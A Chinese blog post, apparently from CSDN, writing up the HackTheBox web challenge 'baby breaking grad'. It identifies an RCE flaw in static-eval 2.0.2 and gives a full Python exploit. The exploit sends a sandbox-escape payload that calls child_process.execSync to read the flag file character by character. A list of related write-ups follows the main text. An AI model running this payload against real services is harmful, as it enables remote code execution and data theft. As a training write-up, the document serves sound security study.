HackTheBox-baby breaking grad

于 2022-02-14 10:17:05 发布
阅读量941 收藏
点赞数
分类专栏: # Web 文章标签: 网络安全 CTF writeup web hackthebox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/galaxy3000/article/details/122918857
版权

文章目录

概述

HackTheBox 网站CTF靶场Web相关题目baby breaking grad,题目地址https://app.hackthebox.com/challenges/baby-breaking-grad,主要考察AST注入的知识点。

在这里插入图片描述

题目

题目概述

开启程序实例后,提示访问209.97.187.217:32476,访问http://209.97.187.217:32476,看到如下Web界面

在这里插入图片描述

直接选择一个提交得到
在这里插入图片描述
下载附件解压缩得到
在这里插入图片描述

源代码

在routes目录下的index.js中,包括对不同url的处理方法
在这里插入图片描述

其中涉及到StudentHelper.js,对应的源代码
在这里插入图片描述
StudentHelper.js用到了static-evalesprima,在package.json中查看他们的版本
在这里插入图片描述

解题思路

可以看到static-eval为2.0.2,存在RCE漏洞,具体可参考https://github.com/advisories/GHSA-8v27-2fg9-7h62

在这里插入图片描述

解题代码

import string
import requests

url = 'http://209.97.187.217:32476/api/calculate'
flag = ''

for i, _ in enumerate(iter(bool, True)):
    for chr in string.printable:
        payload = "(function (x) { return `${eval(\"if(global.process.mainModule.constructor._load('child_process').execSync('cat flag*').toString().charCodeAt(" + str(i) + ") == " + str(ord(chr)) + ") {25} else {1}\")}` })()"

        data = {"name": "AAA", "formula": payload}
        r = requests.post(url, json=data)

        if('Passed' in r.content):
            flag += chr
            print(flag)

            if(chr == '}'):
                quit()

            break

运行代码,得到flag
在这里插入图片描述

galaxy3000
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
“干掉”HackTheBox里面的Writeup
知柯信安
12-14 4598
这篇文章描述了在HackTheBox Writeup机器中查找用户和root flags的过程。因此,一如既往地从Nmap扫描开始,以发现正在运行的服务。 # Nmap 7.70 scan initiated Tue Jun 25 12:42:32 2019 as: nmap -p- -O -sV -oN scan.txt 10.10.10.138 Nmap scan report for ip-10-10-10-138.eu-west-2.compute.internal (10.10.10.138) H
靶机渗透_hackthebox__Writeup -6
qq_34717555的博客
11-11 1166
host:10.10.10.138 nmap 扫描一下 这次也尝试了一下自己的选项和A 选项发现A 比自己设置的要好很多不过这样被发现的几率也大了一些 自己配置的可以有很多降低被发现的选项 # Nmap 7.70 scan initiated Tue Aug 6 20:47:35 2019 as: nmap -A -o nmap.scan 10. 10.10.138 Nmap scan ...
Hack the box靶机 Gradnma
菜浪马废的博客
05-28 275
解决进程问题 进程迁移
Hack The Box -----------------------Active
大方子
12-16 6932
这次的靶机是Hackthebox的Active 靶机IP地址:10.10.10.100 ======================================================================================== 信息收集 nmap -sV -sT 10.10.10.100  Kerberos在88,netbios-ssn在13...
hack_the_box:渗透测试学习之路
03-12
hack_the_box 渗透测试学习之路 索引
Grad-CAM-tensorflow:Grad-CAM的Tensorflow实现(CNN可视化)
05-17
Grad-CAM-张量流 注意:CNN还有另一种很棒的可视化方法,称为 ,它仅涉及前向通过。 演示代码可用于Caffe和Tensorflow ResNet,Vgg。 请检查一下。 这是用于Grad-CAM的演示的tensorflow版本。 我使用ResNet-v1-101...
Swin-Transformer+gradcam可视化代码+Windows环境.zip
01-18
Swin-Transformer+gradcam可视化代码+Windows环境
pytorch-grad-cam:Grad-CAM的PyTorch实现
02-05
在Pytorch中实现Grad-CAM 是什么使网络认为图像标签是“ pug,pug-dog”和“ tabby,虎斑猫”: 将Grad-CAM与引导反向传播相结合的“ pug,pug-dog”类别: 梯度类激活图是用于深度学习网络的可视化技术。 参见...
Grad-CAM.pytorch:pytorch实现Grad-CAM和Grad-CAM++,可以可视化任意分类网络的Class Activation Map (CAM)图,包括自定义的网络;同时也实现了目标检测faster r-cnn和retinanet两个网络的CAM图;欢迎试用、关注并反馈问题..
05-11
Grad-CAM.pytorch ​ pytorch 实现 和 3.1 3.3 5.1 5.2 5.3 5.4 6.1 6.2 6.3 6.4 7.1 7.2 7.3 7.4 Grad-CAM整体架构 Grad-CAM++与Grad-CAM的异同 依赖 python 3.6.x pytoch 1.0.1+ torchvision 0.2.2 ...
基于pytorch实现Grad-CAM和Grad-CAM++项目源码,可以可视化任意分类网络的CAM图
最新发布
10-13
pytorch实现Grad-CAM和Grad-CAM++,可以可视化任意分类网络的Class Activation Map (CAM)图,包括自定义的网络;同时也实现了目标检测faster r-cnn和retinanet两个网络的CAM图; 使用方法 python main.py --image-path ...
Hack The Box - Curling Writeup
qq_23026851的博客
02-02 1690
获得这个box的user很容易,root.txt也其实不难,但是如何获得root shell还有待研究。总之,先记录下过程。 用Nmap + Nikto对目标机进行扫描。 系统用的是Joomla! 3.8.8,且发现了admin登陆页面/administrator/index.php。不需要exploit这个界面,因为80端口上的网页源代码中提示了有secret.txt。 Base64解码后...
新版HackTheBox做题记录(WP)
midi
04-19 3206
HTB(Hack the box)做题笔记WP Challenges:Web{Emdee five for life、Templated、Phonebook、FreeLancer、Gunship、Weather App} ,MISC{misDIRection、Blackhole、Eternal Loop、Longbottom's Locker、Canvas}
Hack The Box 靶机
PJF1501105594的博客
10-24 2194
Hack The Box 邀请码获取 控制台执行makeInviteCode() 查看返回的json data 然后按照对应的编码格式进行解码,按照要求进行获取邀请码即可 see: https://www.jianshu.com/p/1201a0d2cdfe hackthebox 入门攻略: https://www.360zhijia.com/anquan/439315.html h...
No.151-HackTheBox-Linux-CTF-Walkthrough渗透学习
qq_34801745的博客
06-29 2190
** HackTheBox-Linux-CTF-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/172 靶机难度:高级(5.0/10) 靶机发布日期:2019年5月27日 靶机描述: CTF is an insane difficulty Linux box with a web application using LDAP based authentication. The application is vulnera
hackthebox - writeup(考点:信息搜集 & cms made simple安全 & staff组/pspy/修改脚本提权)
冬萍子癸水
05-18 954
1 扫描 22想到可能有ssh登录,80进web信息搜集。 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0) | ssh-hostkey: | 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA) | 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:b
Hack The Box - Help Writeup
qq_23026851的博客
01-30 3114
解题过程: nmap + nikto 扫描目标机,开放22,80,3000端口。并且找到80下的support/路径。 打开http://[ip]/support,发现一个叫HelpDeskZ的应用,源码:https://github.com/evolutionscript/HelpDeskZ-1.0/。该应用的submit ticket功能可以上传任意文件。虽然有file extension...
Hackthebox-OneTwoSeven (Machine Maker: jkr)
weixin_43202322的博客
09-05 797
目录前言0x00 nmap扫描0x01 web0x02 端口转发0x03 后门deb1. 使用burpsuite搭建代理服务器在option 新增一个Edit proxy listener ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190905164311739.png?x-oss-process=image/watermark,type_ZmFuZ3p...
Hack the box靶机 friendzone
菜浪马废的博客
05-24 253
之前得到一个账号 登录一下 上传文件
HackTheBox Cyber Apocalypse 2021 部分题目Writeup
fnmsd的博客
05-06 5585
emm 节前被小白老板叫去参加了HackTheBox Cyber Apocalypse 2021,队伍名TigerEyes,最后排了第15。 为期一周的CTF,做两天就跑出去休假了,摸鱼摸鱼。。 Writeup Web 1(忘了叫啥了) 页面、JS、CSS的注释里分别隐藏了一段flag,一共三段,拼上就行了。 Web-emoji-voting 题目后端使用SQLite数据库,flag表的表名为flag_+10位随机的hex字符。 比较明显的拼接式Order by注入 所以是SQLITE Orderb
PackagesNotFoundError: The following packages are not available from current channels: - pytorch-grad-cam
10-01
PackagesNotFoundError意味着在当前的软件源中找不到所需的包。根据你提供的引用,这个错误可能是由于使用了不可用的软件源引起的。你可以尝试更改软件源或手动下载所需的包。请按照以下步骤进行操作: 1. 找到并打开你的Anaconda Prompt或终端。 2. 使用以下命令更改软件源到默认源: ``` conda config --remove channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/free/ conda config --remove channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/main/ conda config --set show_channel_urls yes ``` 3. 使用以下命令安装pytorch-grad-cam包: ``` conda install pytorch-grad-cam ``` 如果以上步骤仍然无法解决问题,你可以尝试使用其他可用的软件源或手动下载和安装pytorch-grad-cam包。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值